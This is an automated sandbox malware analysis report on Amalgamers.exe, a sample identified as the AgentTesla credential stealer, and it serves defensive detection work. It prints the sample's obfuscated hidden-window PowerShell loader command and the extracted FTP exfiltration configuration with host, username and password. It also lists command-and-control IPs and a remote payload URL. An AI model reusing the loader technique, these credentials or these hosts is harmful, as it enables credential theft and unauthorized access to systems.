Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Amalgamers.exe

Overview

General Information

Sample name:Amalgamers.exe
Analysis ID:1552876
MD5:e2a5b947ac8266e79cc0c9faff051849
SHA1:a128aac0de4bbf879f7df28526e6b59a30fb82b1
SHA256:b5276a247be390e58bbb52535b1437f1aae13ca70930ce885c8aad870ba01053
Tags:exeHUNuser-smica83
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Amalgamers.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\Amalgamers.exe" MD5: E2A5B947AC8266E79CC0C9FAFF051849)
    • powershell.exe (PID: 6428 cmdline: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 600 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: msiexec.exe PID: 600JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: msiexec.exe PID: 600JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.36.171.17, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 600, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49797
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6428, TargetFilename: C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ", CommandLine: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Amalgamers.exe", ParentImage: C:\Users\user\Desktop\Amalgamers.exe, ParentProcessId: 7148, ParentProcessName: Amalgamers.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ", ProcessId: 6428, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-09T20:46:13.669638+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449730TCP
            2024-11-09T20:46:52.578190+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449736TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-09T20:47:13.762981+010020299271A Network Trojan was detected192.168.2.44981986.107.36.9321TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-09T20:47:14.515003+010028555421A Network Trojan was detected192.168.2.44983586.107.36.9335643TCP
            2024-11-09T20:47:14.520299+010028555421A Network Trojan was detected192.168.2.44983586.107.36.9335643TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-09T20:47:08.054416+010028032702Potentially Bad Traffic192.168.2.449797185.36.171.1780TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: msiexec.exe.600.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}
            Source: C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exeReversingLabs: Detection: 57%
            Source: Amalgamers.exeReversingLabs: Detection: 57%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.8% probability
            Source: Amalgamers.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 185.36.171.17:443 -> 192.168.2.4:49803 version: TLS 1.2
            Source: Amalgamers.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_004062A3 FindFirstFileA,FindClose,0_2_004062A3
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405768
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_004026FE FindFirstFileA,0_2_004026FE

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49835 -> 86.107.36.93:35643
            Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49819 -> 86.107.36.93:21
            Source: global trafficTCP traffic: 192.168.2.4:49835 -> 86.107.36.93:35643
            Source: Joe Sandbox ViewIP Address: 86.107.36.93 86.107.36.93
            Source: Joe Sandbox ViewASN Name: DIALTELECOMRO DIALTELECOMRO
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49797 -> 185.36.171.17:80
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49736
            Source: unknownFTP traffic detected: 86.107.36.93:21 -> 192.168.2.4:49819 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
            Source: global trafficHTTP traffic detected: GET //CNDKMREh44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: abreo.plConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET //CNDKMREh44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: abreo.plCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET //CNDKMREh44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: abreo.plConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET //CNDKMREh44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: abreo.plCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: abreo.pl
            Source: global trafficDNS traffic detected: DNS query: ftp.carbognin.it
            Source: msiexec.exe, 00000006.00000002.2878965092.000000000855C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2888745995.0000000023600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://abreo.pl//CNDKMREh44.bin
            Source: msiexec.exe, 00000006.00000002.2878965092.000000000855C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abreo.pl//CNDKMREh44.bina
            Source: msiexec.exe, 00000006.00000002.2891546582.0000000023FCC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.carbognin.it
            Source: Amalgamers.exe, Amalgamers.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Amalgamers.exe, Amalgamers.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: msiexec.exe, 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000006.00000002.2878965092.000000000851A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abreo.pl/
            Source: msiexec.exe, 00000006.00000002.2878965092.0000000008543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abreo.pl//CNDKMREh44.bin
            Source: msiexec.exe, 00000006.00000002.2878965092.0000000008543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abreo.pl//CNDKMREh44.bincq
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownHTTPS traffic detected: 185.36.171.17:443 -> 192.168.2.4:49803 version: TLS 1.2
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405205

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040320C
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_00404A440_2_00404A44
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_00406F540_2_00406F54
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_0040677D0_2_0040677D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02CC4A586_2_02CC4A58
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02CCD2206_2_02CCD220
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02CC41886_2_02CC4188
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02CC9BC86_2_02CC9BC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02CC3E406_2_02CC3E40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02CCD21A6_2_02CCD21A
            Source: Amalgamers.exeStatic PE information: invalid certificate
            Source: Amalgamers.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/17@2/2
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040320C
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004044D1
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_004020D1 CoCreateInstance,MultiByteToWideChar,0_2_004020D1
            Source: C:\Users\user\Desktop\Amalgamers.exeFile created: C:\Users\user\AppData\Local\Reglements216Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
            Source: C:\Users\user\Desktop\Amalgamers.exeFile created: C:\Users\user\AppData\Local\Temp\nss473C.tmpJump to behavior
            Source: Amalgamers.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Amalgamers.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Amalgamers.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\Amalgamers.exeFile read: C:\Users\user\Desktop\Amalgamers.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Amalgamers.exe "C:\Users\user\Desktop\Amalgamers.exe"
            Source: C:\Users\user\Desktop\Amalgamers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Amalgamers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
